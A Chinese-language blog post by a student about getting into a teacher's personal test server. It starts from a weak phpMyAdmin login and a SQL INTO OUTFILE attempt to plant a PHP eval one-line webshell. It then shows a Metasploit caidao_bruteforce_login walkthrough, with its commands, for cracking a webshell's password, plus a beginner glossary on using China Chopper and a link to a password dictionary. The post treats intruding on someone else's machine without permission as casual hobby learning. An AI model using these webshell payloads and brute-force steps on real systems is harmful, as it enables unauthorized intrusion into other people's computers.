利用msf破解一句话木马
0x01 前言
本文为智者楚轩原创文章
事情要从下午说起,同学突然叫我说,xxx,我扫到一个老师在电脑上自己搭建的服务器,上面有他c盘appserv的一些文件。还用弱口令进入了他的phpmyadmin。一听到这个我兴趣就来了。
当时我也进入了那个老师搭建的本机服务器。因为现在已经是深夜,老师早已回家,所以暂时没法找实体的图,我就从qq群里找记录给大家分享一下。这里是当时同学分享出来的老师自己电脑的服务器地址。
我随便翻了一下。有很多老师搭建的试验环境。这是当时发群里的图。
0x02 正文
这里面有很多很多试验环境,我推测是老师在本机上搭建了一个这样的环境,至于是怎么知道是老师的,是因为在phpmyadmin里面的用户看到了某老师的名字。
当时尝试了phpmyadmin里面执行sql上马,想通过sql上马需要满足两个条件,1.root权限,2.得知绝对路径。代码为
SELECT '<?php @eval('$_POST['cmd']');?>' INTO OUTFILE 'C:/AppServ/www/f.php';
但是我发现一个问题,上传php后缀直接sql报错。
然后上传txt后缀的这种可直接访
SELECT '123' INTO OUTFILE 'C:/AppServ/www/f.txt';
但是上传txt后缀的,又是一句话木马的内容的,
SELECT '<?php @eval('$_POST['cmd']');?>' INTO OUTFILE 'C:/AppServ/www/f.txt';
上传之后sql显示成功,但是访问直接404,我推测是被360杀了。因为我在本机上有时候弄个小马啥的都会被360直接隔离。
所以这条路行不通了,此时我逛到了如上图所示的织梦cms那里,想起可以上马,然后那个时候下午六点了,就和同学出去吃饭了,回来的时候老师的笔记本移动服务器已经不在了,估计老师应该回家了。现在想起来sql都不能上马被360杀这个肯定也不行。
好了现在深夜四点我也不是那种不要命的学习的那种,刚十二点就睡了,但是室友各种打dnf吵,一会就说一句话一会又说一句话深感绝望,于是起来学习。看某大佬给我的农夫安全团队的大佬录制的视频,正好看到了一个用msf破解一句话木马的密码的视频。然后想起来今天老师的服务器根目录下面有一个2.php,点开之后啥都没有,我当时推测是一个php木马。然后我用菜刀试了几个我常用的密码,发现都不对。刚刚看到了那个视频讲了一下如何使用msf破解菜刀密码。但是有一点点小的瑕疵,我就补充一丢丢。
首先我用我的电脑复现一下当时老师服务器的情况
这个是我自己的ip地址,当时老师的差不多也是这样,没关目录遍历。然后点开1.php一片空白。
此时用kali开msf,输入search caidao(ps:这个也是我刚刚看农夫安全的视频看到的,在之前从来都不知道msf竟然还有菜刀的模块,国际和中国接轨,感觉很神奇。)
然后老套路,
use auxiliary/scanner/http/caidao_bruteforce_login
还是show options一下
这个时候set rhost 目标ip
set targeturl /木马名
基本的设置就好了,但是注意看这里,他原本的字典是一个啥啥啥unix字典,总之破解率很低,我看了看字典内容,可能里面的密码偏向国外的环境。像国内的环境啊啥的和国外区别很大,比如我经常用cmd,hacker之类的做密码,晚上的时候又问了一个学弟他常用的一句话密码是多少,学弟说c,a,b之类的,那个字典里没有这些。
然后图里我是换了一个字典,这个字典也是那位大佬发给我的,里面有很多的常用webshell密码。我看了一下我和学弟常用的一句话密码都在里面。密码字典见附件。
然后
set PASS_FILE /你的路径/字典名.txt 此时run一下。
这个字典是真的强大。我换了好几个密码字典都可以成功。
本来这个文章到这里就结束了,但是我因为在看很多大佬的文章的时候很多都看不懂,因为涉及到很多专业名词都不懂,所以给一些还没入门的老哥来个我这个文章的一些新手普及,仔细看看这些知识应该能看懂这个文章。
appserv
appserv是一个服务器的集成环境,直接网上搜索下载然后搜索下载安装教程安装即可,这个是apache,php,mysql组成的,可以把你写的静态网页放在appserv的www目录下,改名为index.html(这个是默认访问,假如你访问一个网站,一般来说他默认的就是访问这个页面),然后通过localhost:端口号,127.0.0.1:端口号,ip:端口号,三种方式皆可访问到你的页面。
phpmyadmin
这个是管理mysql的工具,这个一两句话也说不清楚,如果不懂mysql的话肯定没法学安全的,如果不懂这个的话建议大家去学html和php mysql,建议就是会mysql的基本语法,了解mysql是干啥的,了解php是如何调用mysql的,就差不多了,深入一点的话可以自己学习开发一个基本功能的cms,这些教程网上有很多,大家可以去各种论坛搜索。
msf
是metasploit,他是一个非常非常非常强大的集成渗透环境。下载kali linux,在这之前建议你学习一下linux基础,这个metasploit里面有很多很多集成的工具,非常傻瓜式,熟悉一下常用的用法可以通杀很多漏洞。
菜刀
菜刀这个东西我以前刚用的时候不知道用法就瞎搞,相信很多新手刚学的时候也有我一样的问题,就是传上去一个木马,比如我在xx.com.cn/xx/yy/upload.php这里上传了一个木马,然后我开菜刀。直接去连xx.com.cn。。。。。。。然后当时也是不懂就瞎搞,菜刀这个东西必须要找到你上传的木马的路径,就是举个例子xx.com.cn/xx/yy/zz/upload/1.php,然后你开菜刀直接把url输入进去,然后输入木马的密码,就可以了,木马的密码实际上是一个变量,大家可以试试手动搞,把POST改为GET,然后在访问木马的时候加上?你的密码="phpinfo()";学了php就知道一句话木马其实就是接收一个变量。
字典
字典一般用来暴力破解的 ,所谓暴力破解,我直接举个例子,假如你的密码是123456,然后我从000001,000002,000003,000004,000005.......123456,就可以破解出你的密码了。字典暴力破解也是同理,通过很多常见的密码去一个一个的试密码是否正确,不过这些都是由程序完成的。
突然发现字典不能传这里,我留个百度云链接吧。
链接:https://pan.baidu.com/s/1pKO3cT1 密码:q3dh